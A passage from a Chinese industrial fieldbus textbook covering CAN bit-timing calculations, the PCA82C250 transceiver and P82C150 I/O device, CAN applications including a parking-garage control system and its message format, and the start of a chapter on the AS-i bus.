BiteRatemax=1tSCL.min×NBTmin=fCLK.max2×BRPmin×NBTmin(7⁃16)为了得到最大位速率,在NBT表达式中列举的波特率预设寄存器BRP的最小值、CAN控制器振荡器频率的最大值fCLK.max以及位定时各段的最小值等都要恰当选择。最小NBT可以用(7⁃17)确定:NBT≥PROPmax+TSEG2×(1-Δf)1-25×Δf(7⁃17)当PROPmin≥2时,它是有效的。最大传播延时和最小NBT之间的关系如图7⁃20所示。振荡器容差是该图中的主要参数,但是由于存在特定的限制,每一个规格化位定时段的TQ数目都限制在某整数值范围内。需要注意的是,NBT是一个整数值,而PROPmax不一定为整数,因此图7⁃20可以用来确定所要求的最大速率和系统的传播延时是否匹配,即这样一个系统设置是否可行。此过程的大体情况如下:首先,所要求的BRP和NBT的乘积要根据位速率和振荡器频率,用式(7⁃16)计算出,这个乘积是整数值。一般情况下,BRP和NBT的不同组合会得到不同的TQ时间长度。一个TQ的物理持续时间即为tSCL,可以根据BRP计算出。根据图7⁃20,用NBT的值来确定PROPmax(系统所能允许的最大传播延时,这个值必须高于系统中实际的传播延时)。3)合适采样点的确定。在位定时中,采样点的位置完全由TSEG2确定。表7⁃3和表7⁃4给出的计算规则为TSEG2定义了一个最小值和一个最大值,这个最小值或最大值取决于该系统的NBT和传输延时。因此,如果把采样点的位置表达成位定时的百分数,就可以建立一个图表,这里采样点只取决于最大的传播延时和振荡器容差。式(7⁃18)用于定义这个组建的关系:Tsample_point=NBT-TSEG2NBT×100%(7⁃18)式中,Tsample_point为采样点所对应时刻。图7⁃21中的四个区域(①、②、③、④)表示对一个给定传播延时和振荡器容差的采样点所允许的范围。(6)位定时参数的计算在实际应用中,为了使系统性能更加良好,通常要满足一些相矛盾的要求。这些要求可能是:1)高数据流量,即涉及位速率。2)总线长度要长,即影响到传播延时。3)系统价格要低,它可能影响到振荡器的容差。以下说明位定时参数的求取方法。1)用图解法选择位定时参数。这里描述的是,如何利用图7⁃20和图7⁃21逐步得到最合适的位定时参数。假设已知振荡器频率、要求的位速率、最差情况下振荡器容差和系统中任意两个节点之间最小和最大的回路传播延时等。该图解表示法最小传播延时限制在2TQ,在任何情况下必须检查实际最小系统传播延时是否低于这个限制。确定合适位定时参数的过程如下:第一步:确定BRP、NBT、一个TQ的长度tSCL和PROP。利用式(7⁃16),根据所要求的位速率和振荡器频率可计算出BRP和NBT的乘积。计算结果是一个整数值,可能会出现BRP和NBT几个不同的组合,所有组合要写在一个列表中。对应的TQ时间长度用式(7⁃19)确定,并添加到列表中。tSCL=BRP×2tCLK=2BRPfCLK(7⁃19) 此外,最大和最小的往返延时可用式(7⁃4)确定,传播延时由部件的有效循环延迟和系统中总线线路最远端之间的线路延时组成。用已知的持续时间和式(7⁃5)可以计算出PROP的额定值,每个tSCL都要执行这个计算。第二步:选择合适的NBT、PROP和BRP的组合。把得出的NBT和PROP的各组合值与图7⁃20给出的NBT的最小值和最大值进行比较,所有组合要标明是有效的还是无效的。第三步:确定位速率和传播延时之间的折中方案。在进行下一步之前要选择BRP、NBT、PROP和振荡器容差的一个组合。如果选择的NBT或PROP为系统以后的改善留下空间,如更高的位速率或较大的传播延时,则要决定优化哪个参数。第四步:选择合适的采样点位置并计算定时参数。在确定一个合适的BRP和NBT后,可以用图7⁃21来确定位定时参数。根据已知的最大传播延时和位定时周期值,从这个图解可以获得一个合适的采样点位置范围,一旦确定了这个范围,位定时段TSEG2段的最小值和最大值就可以用式(7⁃18)计算出,计算结果必须向上或向下四舍五入到一个整数值。第五步:检查PROPmin的限制。获得完整的一组位定时参数后,要检查这个系统的最小传播延时是否如假设的那样大于2TQ。如果不满足这个限制,那么位定时参数就要用表7⁃3的公式重新计算。这样做的目的是核实所选择的位定时。2)计算位定时参数。第一步:确定TQ和NBT。为了取得期望的位速率,NBT选择的时间份额TQ的量必须是一个整数。当然,这也确定了一个时间份额TQ的持续时间tSCL,如果时间份额的持续时间TQ(tSCL)越小,即NBT越大,则采样点在位周期中的位置以及SJW的大小都有更好的解决方法。但由于CAN协议的最大SJW时间间隔是4TQ,选择太小的TQ时间间隔就不可能提供足够大的同步跳转宽度(SJW)。单凭经验,如果系统要优化成有较大的振荡器容差,则NBT要选择8~16之间的值,而NBT允许的传播延时和总线长度也更大。第二步:确定最小要求的SJW。表7⁃3、表7⁃4中给出的式子定义了最小SJW间隔是振荡器容差、NBT和最小传播延时的函数。当已知系统中任意两点之间的最小传播延时难以确定时,就可以选择为0,这是第一个保守的估计。由方程计算出的两个值中,较大的一个要保证满足两个方程,SJW间隔是整数个TQ,所以选择的值要四舍五入到下一个整数。如果计算出的SJW值大于4,则最初固定的TQ时间间隔要增大(NBT减小),或使用精度更高的振荡器类型。第三步:确定TSEG2的最小值。根据CAN控制器正确重同步的要求以及SJW时间间隔来确定TSEG2允许的最小时间间隔。要正确地重同步,TSEG2间隔至少是2TQ,在接收到一个提早的边沿并确保有最小信息处理时间的情况下,允许缩短TSEG2。此外,TSEG2段必须和上述第二步确定的SJW时间间隔一样大,因此,最小的TSEG2间隔至少要和这两个限制条件中的较大值一样大。第四步:确定TSEG2的最大值。由于CAN网络中传播延时的允许范围更大,因此允许采样点位于位周期的后面。最大系统传播延时限制了允许的最大TSEG2时间间隔,假设已知最大的系统传播延时,则TSEG2的上限可由表7⁃3、表7⁃4中给出的式子计算出。至于最小系统传播延时,如果系统中任意两个节点之间的实际最小传播延时未知,最保守的估计是假设它为0。方程计算出的较小值要保证满足这些方程,由于TSEG2是整数个TQ,因此较小的这个值要四舍五入到下一个整数。第五步:选择正确的位定时参数。根据第三步和第四步的结果,为了求得TSEG2间隔的最大值和最小值并转换为整数个TQ,此时就得出了TSEG2值的可能范围。选择所有满足要求的最大值可以使在有噪声环境下采样点的选择有更大的容限,相反,选择一个尽可能小的SJW值可以限制由于毛刺引起的错误重同步对系统的影响。确定了TSEG2的值后,TSEG1的值就可以用表达式(7⁃1)计算出。然后,要检查所有结果是否在允许的可编程范围内。7.3.2CAN总线收发器———PCA82C250CAN总线收发器PCA82C250提供了CAN控制器与物理总线之间的接口,是影响网络系统安全性、可靠性和电磁兼容性的主要因素。1.概述PCA82C250是CAN控制器与物理总线之间的接口,它最初是为汽车中的高速应用(达1Mit/s)而设计的,该器件可以提供对总线的差动发送和接收功能。PCA82C250的主要特性如下:1)与ISO11898标准完全兼容。2)高速率(最高可达1Mbit/s)。3)具有抗汽车环境下的瞬间干扰及保护总线能力。4)采用斜率控制(SlopeControl),降低射频干扰(RFI)。5)过热保护。6)总线与电源及地之间的短路保护。7)低电流待机模式。8)未上电节点不会干扰总线,总线至少可连接110个节点。2.PCA82C250功能框图PCA82C250的基本性能参数和引脚功能见表7⁃5和表7⁃6,其功能框图如图7⁃22所示。 3.PCA82C250功能描述PCA82C250驱动电路内部具有限流电路,可防止发送输出级对电源、地或负载短路。虽然短路出现时功耗增加,但不至于使输出级损坏。若结温超过160℃,则两个发送器输出端极限电流将减小。由于发送器是功耗的主要部分,因而限制了芯片的温升,器件的所有其他部分将继续工作。PCA82C250采用双线差分驱动,有助于抑制汽车等恶劣电气环境下的瞬变干扰。引脚8(Rs)用于选定PCA82C250的工作模式,有3种不同的工作模式可供选择:高速、斜率控制和待机,见表7⁃7。对于高速工作模式,发送器输出级晶体管被尽可能快地启动和关闭。在这种模式下,不采取任何措施限制上升和下降的斜率。此时,建议采用屏蔽电缆,以避免射频干扰问题的出现,通过把引脚8接地可选择高速工作模式。对于较低速度或较短的总线长度,可使用非屏蔽双绞线或平行线作总线。为降低射频干扰,应限制上升和下降的斜率。上升和下降的斜率可以通过由引脚8至地连接的电阻进行控制,斜率正比于引脚8上的电流输出。如果引脚8接高电平,则电路进入低电平待机模式。在这种模式下,发送器被关闭,接收器转至低电流,如果检测到显性位,则RXD将转至低电平。微控制器应通过引脚8将驱动器变为正常工作状态来对这个条件做出响应,由于在待机模式下接收器是慢速的,因此将丢失第一个报文。PCA82C250真值表见表7⁃8。 双绞线并不是CAN总线的唯一传输介质。利用光电转换接口器件及星形光纤耦合器可建立光纤介质的CAN总线通信系统,此时光纤中有光表示显性位,无光表示隐性位。利用CAN控制器的双相位输出模式,通过设计适当的接口电路,也不难实现人们希望的电源线与CAN通信线的复用。另外,CAN协议中卓越的错误检出及自动重发功能,为建立高效的基于电力线载波或无线电介质的CAN通信系统提供了方便。7.3.3I/O器件———P82C150及节点开发1.P82C150P82C150是一种数字和模拟的I/O器件,它具有CAN总线接口。使用P82C150可以提高微控制器I/O能力,降低线路的数量和复杂性,是一种高效又廉价的方法,在自动化仪表及通用工业中的传感器、执行器接口和机电领域都有广泛的应用。P82C150的功能主要有三个方面,分别介绍如下:(1)I/O功能1)16条可配置的模拟及数字I/O口线。2)每一条I/O口线都可以通过CAN总线单独配置,这些配置包括口工作模式、I/O方向和输入跳变的检测功能等。3)P82C150用作数字输入时,可将其设置为由输入端变化而引起CAN报文自动发送。4)具有6路模拟输入通道的10位A⁃D转换器。5)具有两个分辨率为10位的准模拟量输出,该准模拟量分配脉冲调制PDM。6)具有两个通用比较器。(2)CAN接口功能1)具有严格的位定时,且符合CAN技术规范V2.0A和V2.0B。2)具有全集成的内部时钟振荡器,不需要晶振,其位速率为20kbit/s~125kbit/s。3)具有自动检测和校正位速率的功能。4)支持总线故障自动恢复。5)含有4个可编程标识符位,一个CAN总线系统上最多可连接16个P82C150。6)带有CAN总线差分输入比较器和输出驱动器。7)具有通过CAN总线唤醒功能的睡眠方式。(3)工作特性1)工作温度为-40~+125℃。2)电源电压为5(1±4%)V,典型电源电流为20mA。3)采用28脚小型表面封装。P82C150共有9个16位的I/O寄存器:数据输入寄存器(地址0,只读)、正沿寄存器(地址1,只写)、负沿寄存器(地址2,只写)、数据输出寄存器(地址3,只写)、输出允许寄存器(地址4,只写)、模拟配置寄存器(地址5,读/写)、DPM1寄存器(地址6,只写)、DPM2寄存器(地址7,只写)和A⁃D寄存器(地址8,只读)。P82C150在收到数据以后,会自动发送相应的I/O寄存器更新后的数据帧作为应答,接收和发送的数据帧格式相同。2.节点开发图7⁃23所示为CAN节点设计电路。作为CAN总线节点的P82C150,与模拟量输入和开关量输入直接相连,P82C150把所采集到的信号通过PCA82C250送至总线,接着进一步送往总线上其他带有中央处理器CPU的节点进行处理。与此同时,P82C150也把总线上接收到的控制输出信号送至驱动电路,从而对电动机、指示灯等设备进行控制。 7.4CAN总线控制系统的应用CAN总线控制系统是由不同控制节点构成的分布式控制网络,CAN总线控制系统的设计核心是节点功能划分和CAN通信接口的软硬件设计。7.4.1汽车内部CAN总线解决方案CAN总线采用了许多新技术及独特的设计,与其他总线技术相比具有突出的可靠性、实时性和灵活性。CAN总线已成为欧洲汽车制造业的主体行业标准,已成为汽车内部电子控制的主流总线。现代汽车内部装置采用电子控制,例如发动机的定时注油控制,加速、制动控制及防抱死制动系统(ABS)等,这些设备的测量与控制需交换数据,而采用硬接信号线的方式不仅烦琐、昂贵,而且故障率高。因此,世界上一些著名的汽车制造厂商,例如奔驰(Benz)、宝马(BMW)、保时捷(Porsche)、美洲豹(Jaguar)和通用汽车(GM)等都已采用CAN总线实现汽车内部控制系统与检测和执行机构间的数据通信。汽车内部总线可分为动力、照明、操作、显示、安全和娱乐等多个子系统,每个连接到总线上的节点称为电子控制装置(ECU)。基于CAN的汽车内部总线的解决方案之一如图7⁃24所示。根据各节点的实时性要求,设计了高、中、低速的3种速率不同的CAN通信网段,并通过网关集成。虽然CAN总线最初是为汽车内部总线而设计的,但目前应用领域很广,如在电梯制造、纺织机械制造、医药系统和工厂自动化等领域均有应用。针对不同的应用领域,基于CAN规范开发出多种应用层协议,如CANKingdom、DeviceNet、SDS、CAL和CANOpen等。 7.4.2CAN总线立体车库控制系统1.立体车库控制系统的构成立体车库控制系统应用于一种新型液压驱动升降横移式立体车库,该车库主要由1套升降机构、7套横移机构以及1个液压泵站等组成,其中,升降机构为液压驱动,横移机构及泵站为电动机驱动,系统还有大量接近开关等传感器。该车库具有输入传感器多、输出执行器多、布线距离远等特点。由于传统DCS的控制模块和I/O模块集中于控制柜,如果将其应用于本例的车库控制,需要将每个装置的每个信号都分别连接到控制器,存在布线工作量大、调试困难、物料成本高、有潜在故障隐患和维护困难等问题,故不适宜工程要求。而FCS以其彻底的开放性、全数字化信号系统和高性能的通信系统,可以使车库控制系统节省硬件数量与投资、节省安装费用与维护费用。立体车库控制系统的核心设备是一台基于电液比例控制的液压缸,该液压缸与比例节流阀、位移传感器及控制器等构成闭环控制系统。此外,系统还有多部交流异步电动机和大量位移传感器以及液位传感器、温度传感器等。这些设备与传感器分布在车库的各个位置,比较分散,考虑到现场实际,适宜选用基于CAN总线的FCS。液压缸的闭环控制系统设置在升降运动控制节点内,每台横移电动机及其配套传感器组由一个横移运动控制节点驱动,泵站电动机及其配套传感器组构成环境控制节点,车库的自动存取车和手动存取车分别由上位机节点和车位呼叫节点完成。控制系统结构框图如图7⁃25所示。2.基于CAN总线的车库控制系统特点由于CAN总线控制系统相较于传统DCS在结构上的根本改变,使其在车库控制系统的设计上以及在系统的安装、调试和维护等方面都显示出巨大的优越性。具体特点如下:(1)极大地提高了车库运行过程的信息化水平CAN总线技术强大的信息集成及传输能力,使得车库运行过程中大量的信号集成成为可能。这些信号除了传感器和驱动机构的实时值外,还有各种辅助信号、故障信号和管理信息等。(2)减少硬件数量与投资CAN总线系统中的智能节点能直接执行传感、控制、报警和计算等功能,因此可以减少变送器的数量,不再需要单独的调节器和计算单元等,也不需要传统控制系统中的信号调理、转换、隔离等功能单元及其复杂接线。另外,最明显的特点是信号电缆的大量减少,从而可以节省大笔电缆购置费用。(3)节省安装费用由于节省大量电缆,车库现场接线变得十分简单。据有关资料介绍,仅安装费用一项就节省60%以上。(4)节省维护费用CAN总线控制系统结构简单,信号电缆极少,从而大大减少系统维护工作量。(5)提高系统的控制精度和可靠性由于CAN总线节点的智能化和数字化,与模拟信号相比,它从根本上减少了传输误差,提高了检测与控制精度。7.4.3CAN通信的接口设计与报文设计1.CAN通信的接口设计CAN通信接口的硬件设计主要包括通信控制方案的选择和现场环境的适应性与可靠性设计。通信控制方案有两种:独立CAN控制器方案和内嵌CAN控制器方案。前者采用独立的CAN控制器芯片驱动CAN总线接口,后者采用内嵌CAN控制模块微处理器芯片。前者CAN驱动电路相对独立便于模块化设计,节点的微处理器选型容易,适用性强,但是相较后者电路设计较复杂,印制电路板(PCB)面积大,可靠性降低;后者CAN驱动电路相对简单,集成度更高,设计紧凑,但是节点的微处理器选型受限,且成本偏高。这两种控制方案的结构框图如图7⁃26所示。独立CAN控制器方案适合成本限制较大,批量较小,节点功能差异性较大以及在设计初期节点功能不明确的项目,而内嵌CAN控制器方案适合设计要求明确,批量较大,可靠性要求较高的项目。综合分析本车库设计需求,选择独立CAN控制器方案。CAN控制器选用应用最广泛、性能稳定的SJA1000芯片,该芯片为飞利浦半导体公司专为CAN总线设计的控制器芯片。 由于车库现场环境存在较多的电磁干扰,使用条件恶劣,因此针对使用环境进行适应性与可靠性设计十分必要。该方面的设计主要在以下三方面进行:第一,电源设计;第二,信号隔离;第三,软件滤波。第一,由于车库现场环境的供电条件受电网波动、大功率设备起停、高频电磁干扰等影响较大,需要为整个节点控制器设计良好、稳定的电源。设计中,对系统的电源一致采用DC+5V电压,光耦合器部分电路所采用的两个电源必须完全隔离。 该电路由AH805升压模块及FP106升压模块组成。AH805是一种输入为1.2~3V,输出为5V的升压模块,在3V电池供电时可输出100mA电流。FP106是贴片式升压模块,输入为4~6V,输出固定电压为(29±1)V,输出电流可达40mA,AH805及FP106都有一个电平控制的关闭电源控制端。两节1.5V碱性电池输出的3V电压输入AH805,AH805输出+5V电压,其一路作为5V输出,另一路输入FP106使其产生28~30V电压,经稳压管稳压后输出+12V电压。从图中可以看出,只要改变稳压管的稳压值,即可获得不同的输出电压,使用灵活方便。FP106的第5脚为控制电源关闭端,在关闭电源时,耗电几乎为0,当第5脚加高电平大于2.5V时,电源导通;当第5脚加低电平小于0.4V时,电源关闭。可以用电路来控制或手动控制,若不需要控制时,第5脚与第8脚连接。第二,CAN总线信号隔离设计部分。由于总线上连接了众多设备,且布线时不可避免靠近一些强电磁辐射设备,如交流异步电动机、液压电磁阀等,必然引入各类干扰信号。虽然CAN总线电缆在设计之初就考虑尽量减少干扰的影响,但要求其电缆完全没有干扰信号也不现实。所以对车库现场环境下的通信接口电路采取光电隔离设计十分必要。需要特别指出的是,如前电源设计时提到的,对信号进行光电隔离设计时,必须同时对电源进行隔离,不然隔离措施将失效。设计的CAN通信接口电路图如图7⁃28所示。第三,同时应用软件滤波技术和硬件抗干扰技术,可以达到较好的抗干扰效果。2.CAN报文设计在CAN报文设计中可以应用已有的标准化CAN总线应用层协议,如CANOpen、Devi⁃ceNet和SDS等。这些协议基于一种通用性、标准化的定义,从长远看,采用标准应用层协议对于工业控制的通信标准化和系统的兼容性是有益的。但是,由于车库的控制较简单,通信内容并不复杂,如果采用标准CAN总线协议,将造成通信协议过于复杂,通信效率降低。因此,控制系统采用自定义应用层协议。结合新型液压驱动升降横移式立体车库的结构和运行特点,本文设计了一种适合车库控制、结构紧凑的报文格式。具体的报文格式见表7⁃9。CANV2.0B规范有标准帧和扩展帧两种帧格式,前者为11位标识符,后者为29位标识符。在立体车库控制系统中11位标识符足够包含所有信息,且可以提高通信效率,故采用标准帧格式。其包含以下四部分:类型码、目标节点地址、通信模式和应答模式。以下为其含义说明:1)类别码:占2位,区别报文的类型,设定其优先级。共包含四种类型:故障报警信息、控制信息、状态信息和网络管理信息,分别以00、01、10、11表示,优先级依次降低。2)目标节点地址:占7位,指定接收报文的节点。前2位表示节点类型:00表示主控节点,01表示上位机,10表示环境控制,11表示运动控制;后5位表示节点编号:编号0空余,用于广播通信,剩余编号允许31个节点存在,可以满足一般车库的要求。3)通信模式:占1位,指定报文由单个节点或多个节点接收,单点接收该位置1,多点接收该位置0,配合报文过滤机制实现广播功能。4)应答模式:占1位,指定报文接收方是否需要应答,需要应答该位置1,无须应答该位置0,与通信模式位配合实现多种通信方式。报文数据域由0~8B构成,由三部分组成:源节点地址、指令类型描述和控制指令或数据。数据1即源节点地址,该字节指出报文的发送节点,其编码格式与仲裁域中的目标节点地址编码格式相同,源节点地址的最高位补0。数据2即指令类型描述,该字节用于界定数据3~8包含的信息类别,当前车库指令主要包括以下5类:运动控制指令、运动反馈指令、报警信息指令、状态信息指令和错误信息指令。数据3~8即控制指令或数据,主要指报文传送的具体指令或数据。例如,通常由上位机节点或呼叫控制节点发出的运动控制指令的数据主要是待存取车的位置信息。而相应的运动控制节点收到指令并执行后,会发送一条运动反馈指令,该指令的数据包含该节点当前的位置信息。对于传递数据量较小而传递频率较高的立体车库来说,8B的数据域能够保证每帧传递足够的信息,而且可以提高传递速度,因此不需要定义帧的分段协议。 第8章AS⁃i总线技术 执行器⁃传感器⁃接口(Actuator⁃Sensor⁃Interface,AS⁃i)总线是一种控制总线系统,用来在控制器(主站)和传感器/执行器(从站)之间进行双向信息交换,它属于工业控制系统底层(传感器级)的监控网络。一个AS⁃i总线系统既可以组成主从方式的监控网络,也可以通过主站中的网关和其他多种现场总线(如DeviceNet、PROFIBUS、Modbus、CC⁃link等)相连接,构成更大的监控系统,这时AS⁃i主站可作为上层现场总线的一个节点服务器(从站),在它下面又可以挂接一批AS⁃i从站。主机电路和具有强大功能的微处理器共同构成了AS⁃i主站。AS⁃i主站内含网关,也可带有可编程序控制器(PLC)。AS⁃i从站可以是传感器和执行器,这种传感器和执行器要具有开关量特征。传感器可以是各种工作原理的位置接近开关以及温度、压力、流量、液位开关等。执行器则是各种开关阀门、声光报警器,也可以是继电器、接触器等低压电器。除开关量设备外,AS⁃i总线也可以连接模拟量设备,例如各种参数的变送器和连续动作的调节阀和电动执行器等,只是模拟信号的传输要占据多个传输周期。在连接主站和从站的两芯电缆上除传输信号外,同时还可为主、从站和传感器提供工作电源。当从站的输出信号需要较大的功率电流时,则需要外接辅助电源。AS⁃i总线与其他现场总线技术没有竞争的态势,因为AS⁃i总线从研制开始就明确定位它是处于各种现场总线网络的下层来连接各种传感器和执行器的。简单、高速、可靠、灵活的网络拓扑结构,信号传输和电源供给合二为一的传输系统,这些功能完全满足了控制系统底层的各种需求。因此,AS⁃i总线在市场上具有很强的竞争力。8.1AS⁃i总线概述8.1.1AS⁃i总线技术特点1.系统完整在分析了传统的I/O并行方式和树形结构的优缺点以及开关量的技术特点的基础上,AS⁃i总线才发展起来,它省去了各类I/O卡、分配器、控制柜和大量的连接电缆。使用两芯扁平电缆和特殊的穿刺安装技术是AS⁃i总线的亮点,正因为如此,传感器/执行器可以很方便地连接到AS⁃i网络上。对于控制点较少的小系统来说,总线可以组成主、从站的独立系统来使用。对于大系统而言,可以由网关或连接器将AS⁃i和其他现场总线连接使用,如此AS⁃i总线便成了任何一个高级现场总线的子系统或附加总线,在世界各地的现场总线应用案例中,这种情况占了近1/3的比例,因此,可以说AS⁃i总线并不是现有的其他总线的竞争对手,而是一个附件,该附件是技术上需要、经济上可行的。2.应用简单AS⁃i总线是一个主从系统,它的主站和所有从站信息的交换都是双向的,主站可以和上层现场总线进行通信,其数据结构简单,用户只需进行一些必要的参数设置和系统连接就可以使主站运行,主站的一项主要工作就是分配从站的地址。如果地址分配已经完成,系统中的某一从站损坏了,则可以去掉已损坏的从站,重新安装一个新从站,对该新从站的要求是地址为0、型号与旧从站相同,之后系统就会执行“自动地址设定”操作,自动把丢失的那个从站地址下载给新从站,自动恢复相关功能。因为AS⁃i是机电一体化设计,所以它所有的模块都具有“即插即用”功能,即可进行“热插拔”操作。3.传输快捷AS⁃i总线系统的主站和从站之间采用串行双向数字通信方式。由于其报文较短,在有1个主站、31个从站或1个主站、62个从站的系统中,AS⁃i总线的通信周期大约为5ms或10ms。换句话说,主站在5ms或10ms内就可以对31个或62个从站轮流访问一遍,而且所有从站的输入输出操作也完成一遍。4.功能可靠AS⁃i总线在许多方面都采取了相应的措施来抵抗外界的干扰。主、从站的制造采用集成电路,比用分立元件更加可靠;AS⁃i网络是对称结构设计,可以将电磁干扰降到最低;传输信号是正弦二次方尖脉冲设计,可以有效提高抗干扰能力;通信报文纠正错误信息是通过循环冗余校验(CRC)的方式来进行的;主站可连续监测网络传输功能,从站有自我监控功能,可向主站控制器报告错误。根据欧洲标准EN60870⁃5⁃1的规定,数据完整性的定义有三个等级,AS⁃i总线处于2~3级,是较高的级别。假设一个AS⁃i网络系统连续工作168h(7天,每天24h),数据通信数位错误概率是10-3,剩余错误概率是10-12,这意味着平均每5年会出现一个意外错误。5.节省资金与传统的I/O并行方式的树形结构控制系统相比,AS⁃i总线系统能够节省大量的连接电缆、安装费用和大约1/4的工程费用。此外,如果由于生产流程改变,用户需要扩展系统、改变控制动作或运行中出现故障时,快速安装、故障诊断、自动测试、预防性维护和程序参数化等AS⁃i总线所具有的功能可以大大缩短由于系统重新配置和排除故障所浪费的时间,既可以提高效率,又可以节省资金。6.系统的开放性在研发AS⁃i总线系统之初,就已经确定了它必须是一个开放的系统。在AS⁃i规范和AS⁃i行规中,对AS⁃i不同部件的定义和技术要求都有详细的描述,主站和从站之间的通信协议以及整个系统与主站和周围设备的连接方式都有特别的描述。任何AS⁃i部件的生产商都必须遵守诸如两芯电缆、机电一体化(EMS)接口、功能模块以及它上面的I/O标准接口等这些规范。为了保证各类AS⁃i产品的兼容性和互操作性,所有厂商生产的产品都必须经过AS⁃i协会指定机构的标准化测试和程序认证。8.1.2AS⁃i总线体系结构AS⁃i总线的结构为主从式,整个系统的中心是AS⁃i主机,AS⁃i主机可以安装在控制器中,如工业PC(IPC)、可编程序控制器(PLC)以及数字调节器(DC)的内部,例如可把它做成专门的插卡插入PC的总线槽内,这样就把AS⁃i主机电路和工业PC的CPU连接起来。像这样将各种具有以高性能微处理器为核心的设备和AS⁃i主机组合在一起,称为系统的主站(Master)。从站(Slave)可以为两种:一种是智能传感器/执行器,该智能传感器/执行器带有AS⁃i通信接口,在其内部装有AS⁃i从机专用芯片,外加一些外围元件和存储器,这样就构成了一体化的从站,每个一体化的从站占有一个地址码;另外一种是分离型结构,该分离型结构由普通的传感器/执行器和专门的AS⁃iI/O接口模块构成,I/O接口模块中带有从机专用电路,分离型从站就是由I/O接口模块和普通的传感器/执行器组合在一起形成的,每个分离型从站占有一个地址码。除了带有I/O接口外,从机电路还带有通信接口,将通信接口用非屏蔽、非绞接的两芯电缆把主站和多个从站连接起来便形成AS⁃i控制总线网络系统。图8⁃1所示是一个AS⁃i总线网络的立体结构图。a和b称为“连接模块”,可以用来方便地构建AS⁃i总线网络系统。a模块是为接线方便而专门设计的,b模块可以和智能型传感器/执行器连接,还可以和用户模块连接。该总线网络使用专门的扁平电缆作为通信电缆,“连接模块”带有PG标准防护接线盒。图8⁃1点画线框中a所示为一个未加盖的“连接模块”的局部放大图,可以清楚地观察到两芯电缆的相互连接方式。c、d、e为“I/O接口模块”,每个模块可以带有一个或多个I/O接口,可以连接在普通传感器/执行器上,例如c模块可外接4个电感式传感器,d模块可外接一个光栅式传感器,e模块可外接2个输入量、1个输出量。f模块本身就是智能型光电传感器,它带有从机专用芯片,可直接和“连接模块”b背靠背相连。h模块是一个带有大功率执行器的“I/O接口模块”,使用时必须外接辅助功率电源,以便向执行器提供较大电流。如果用螺钉把“连接模块”b和“功能模块”f拧在一起,就形成了AS⁃i标准接口,即AS⁃i机电一体化(AS⁃iEMS)结构。g是一个智能型电感式传感器,内置从机专用电路,因此直接和a连接。整个系统的主站是一个带有CPU和存储器的控制器(工业PC、PLC),用户应用程序写在存储器中。 8.1.3AS⁃i总线传输系统1.传输电缆和专用电源在选择AS⁃i总线电缆时必须注意两个方面的技术指标:通信频谱特性和直流阻抗特性。因为AS⁃i总线电缆既要传输信号又要提供电源。在干扰较强的情况下,需要使用屏蔽电缆,如型号为(N)YMHCY⁃02×1.5的电缆,它也要满足规定的频谱和阻抗特性要求。AS⁃i总线电缆的等效电路模型如图8⁃2所示。在图8⁃2中,传输电缆分为两种模型:两芯电缆和带屏蔽层两芯电缆。图中电阻(R′)、电容(C′)、电感(L′)和电导(G′)的值为AS⁃i电缆的等效参数。两芯电缆在传输速率为167kbit/s时,总的极限参数为:R′=20~50mΩ/m,L′=200~600nH/m,C′=35~70pF/m,G′=1~3μS/m。带屏蔽层的两芯电缆在同样的传输频率时,与屏蔽层有关的极限参数为:R′s=10mΩ/m,L′s=800nH/m,C′s=300pF/m,G′s=15μS/m。 AS⁃i电源的电压为DC29.5~31.6V,每个从站向传感器/执行器提供的电源电压为DC24V(误差为-15%~10%)。在一个AS⁃i总线系统中,31个从站AS⁃i电源可提供的最大电流为2A,62个从站AS⁃i电源可提供的最大电流为4A,因此每个从站平均消耗的电流为65mA,该电流只能供给从机电路和传感器、执行器中的工作电路使用。在整个系统中,AS⁃i电缆上允许的最大压降为3V,也就是说要保证网络中每个从站都能得到规定的电压值,电缆的横截面积最小为1.5mm2。2.传输信号调制AS⁃i信号在进行传输之前要进行调制,采用什么样的调制方法要考虑诸多因素,例如:①附加在电源电压上的传输信号必须是交变的;②主站和从站之间的双向通信要求双方都能够产生简单有效而且节省时间的窄带传输脉冲;③使用非屏蔽电缆时不应有太多的干扰等。AS⁃i信号的调制采用交变脉冲调制(AlternatingPulseModulation,APM)方式,APM是一种串行通信方式,在基频上进行调制,主站发出的请求信号位序列首先转换为曼彻斯特Ⅱ(ManchesterⅡ)编码,即能执行相位变换的位序列,这样就产生了相应的传输电流。当传输电缆上的电流在通过电源中解耦电路里的电感元件的情况下会产生电压突变,就会在电缆上产生请求信号电压,每一个增加的电流会产生一个负电压脉冲,每一个减少的电流又会产生一个正电压脉冲,从站通过这种方式很容易从电缆上得到请求信号。由于信号是叠加在电源上的,所以信号电压的幅值有时会大于AS⁃i的电源电压。因为从站内并不需要电感元件,所以带有从站专用芯片的智能型传感器/执行器一体化从站的电路更小、更简便、更经济,在从站中把电缆上的请求信号电压接收下来再转化为初始的位序列,这样就完成了一次主站向从站请求信号的转换过程。信号传输的电压脉冲的设计是正弦二次方脉冲方式,这是因为考虑到了低频干扰的影响,通过选择这种合适的传输波形可提高可靠性。在规定的拓扑结构中经过这种调制后的信号每两位脉冲信号的间隔只有6μs。3.传输故障与抗干扰电磁兼容性(EMC)问题在非屏蔽电缆上进行高速的AS⁃i信号传输过程中显得非常重要,发射干扰和现场的场强辐射干扰都不能超过欧洲标准EN55081给出的极限值,即使在恶劣的电磁环境中,AS⁃i传输系统也具有较强的抗干扰能力,AS⁃i系统的电磁兼容性抗干扰能力符合IEC801文件中各种有关标准的规定。经过对AS⁃i系统大量的测试,数据表明AS⁃i系统的发射干扰能保持在IEC的规定值以下,这是因为传输信号采用了正弦二次方脉冲的原因。AS⁃i系统对于外部电磁高速瞬间放电的干扰,在26MHz~1GHz频率范围内的抵抗能力可达到3级。AS⁃i传输系统不但具有抵抗外部干扰的能力,还具有故障诊断和自动恢复能力。在最坏的情况下,通信会出现故障,但系统具有检测功能,可以对报文进行重发,因为是短信息,所以重发不会增加周期时间,只有在报文发生严重错误时,才会增加报文的周期长度,当位传输错误率在70bit/s时,系统周期仍保持为5ms(31个从站)。如果错误率再高一点,周期时间变化不大,AS⁃i系统仍能保持它所有的功能,只有当传输错误率在5000bit/s时,正常的数据传输才难以维持。当AS⁃i电缆被切断时(如错误短接或故障断开),主站就不能访问位于断点另一侧的从站了,而位于主站一侧的从站仍可以被主站呼叫。主站通过运行管理服务程序能够诊断和发出故障信号,但这一点的前提是具有数据解耦电路的AS⁃i电源应与主站在同一侧,否则系统就会完全瘫痪。如果AS⁃i系统中使用了中继器,当AS⁃i电源发生故障时的影响就会减小,系统会维持部分功能,因中继器也可以向网络供电。在连接网络系统中主站、从站、电源和传感器/执行器的过